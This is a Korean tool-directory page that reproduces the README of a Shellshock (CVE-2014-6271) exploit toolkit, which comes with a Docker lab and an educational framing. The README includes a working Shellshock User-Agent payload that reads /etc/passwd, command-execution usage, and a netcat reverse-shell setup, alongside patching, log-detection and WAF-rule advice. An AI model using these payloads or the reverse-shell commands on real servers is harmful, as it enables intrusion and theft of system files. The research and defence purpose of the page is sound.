Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
bash-apocalypse — 셸쇼크(Shellshock, CVE-2014-6271) 재현 - 수백만 대의 서버를 위험에 빠뜨린 배시(bash) 취약점. 자동화된 익스플로잇 툴킷 + Burp Suite 방법론 + Docker 랩. 보안 연구 및 교육 목적으로 제작됨. 공격적 보안 포트폴리오 프로젝트. | Kitploit
도구/GitHubGitHub/mtaha-sec/bash-apocalypse
Vulnerability ScannersPayload GenerationExploitationIDS/IPS EvasionShellcodeWeb Application ExploitationPenetration TestingCommand and ControlMisconfigurationLearning & EducationLabs & Practice
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
mtaha-sec/bash-apocalypse

bash-apocalypse

셸쇼크(Shellshock, CVE-2014-6271) 재현 - 수백만 대의 서버를 위험에 빠뜨린 배시(bash) 취약점. 자동화된 익스플로잇 툴킷 + Burp Suite 방법론 + Docker 랩. 보안 연구 및 교육 목적으로 제작됨. 공격적 보안 포트폴리오 프로젝트.

저장소 보기

Bash 아포칼립스

CVE-2014-6271 (Shellshock) 자동 익스플로잇 툴킷

Severity CVSS Score

2014년 수백만 대의 서버에 영향을 준 Shellshock 취약점을 시연하는 완전한 보안 연구 프로젝트입니다. 자동 스캐닝, 익스플로잇 기능 및 방어 권장 사항을 포함합니다.

Demo


Shellshock이란?

Shellshock (CVE-2014-6271)은 환경 변수 조작을 통해 원격 코드 실행을 허용하는 Bash 셸의 심각한 취약점입니다. 22년 동안 존재하다가 2014년에 발견되었으며, 전 세계 수백만 대의 Unix/Linux 시스템에 영향을 미쳤습니다.

작동 방식:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

CGI를 사용하는 웹 서버는 HTTP 헤더를 환경 변수로 Bash에 전달하여 취약하게 만듭니다:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

빠른 시작

root@kitploit:~
# Clone and setup
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Start vulnerable lab
docker-compose up -d

# Run exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

기능

자동 스캐너

  • 취약한 CGI 엔드포인트 발견
  • 여러 주입 지점(User-Agent, Referer, Cookie) 테스트
  • 사용자 정의 워드리스트 지원

익스플로잇 도구

  • 출력 캡처와 함께 명령 실행
  • 자동 리버스 셸
  • 다양한 페이로드 옵션

실습 환경

  • 원클릭 Docker 설정
  • 격리된 취약 서버
  • 안전한 테스트 환경

사용법

취약점 스캔

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

명령 실행

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

리버스 셸 얻기

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

수동 익스플로잇 (Burp Suite)

1단계: 요청 가로채기

Burp Intercept

2단계: 페이로드 주입

Exploitation

User-Agent 헤더 수정:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

3단계: 응답 확인

Reverse Shell

서버가 명령을 실행하고 출력을 반환합니다.


기술 분석

공격 흐름

root@kitploit:~
클라이언트 (공격자)
    │
    │ 악의적인 User-Agent가 포함된 HTTP 요청
    ▼
웹 서버
    │
    │ 헤더를 환경 변수로 전달
    ▼
CGI 스크립트
    │
    │ Bash 프로세스 생성
    ▼
Bash 셸
    │
    │ 함수 구문 분석 + 후속 명령 실행
    ▼
명령 실행 (RCE)

근본 원인

Bash가 환경 변수에서 함수 정의를 발견하면:

  1. 함수를 구문 분석: () { :;}
  2. 버그: 계속 구문 분석하여 이후의 모든 것을 실행
  3. 결과: 임의 명령 실행

방어

즉시 완화 조치

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

탐지

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

WAF 규칙

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

입증된 기술

  • 웹 애플리케이션 침투 테스트
  • Bash 스크립팅 및 자동화
  • HTTP 프로토콜 조작
  • Docker 컨테이너화
  • Burp Suite 숙련도
  • 공격 및 방어 보안 모두

프로젝트 구조

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # 주요 도구
├── payloads.txt            # 테스트 페이로드
├── docker-compose.yml      # 실습 설정
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

법적 고지

교육 목적으로만 사용하십시오. 소유하고 있거나 명시적 테스트 권한이 있는 시스템만 테스트하십시오. 무단 액세스는 불법입니다.


참고 자료

  • CVE-2014-6271 상세 정보
  • Cloudflare: Shellshock 내부
  • 실습: HackTheBox - Shocker

취약점이 어떻게 작동하는지 이해하고 이를 방어하는 방법을 배우기 위해 제작되었습니다. ;)

도구 다운로드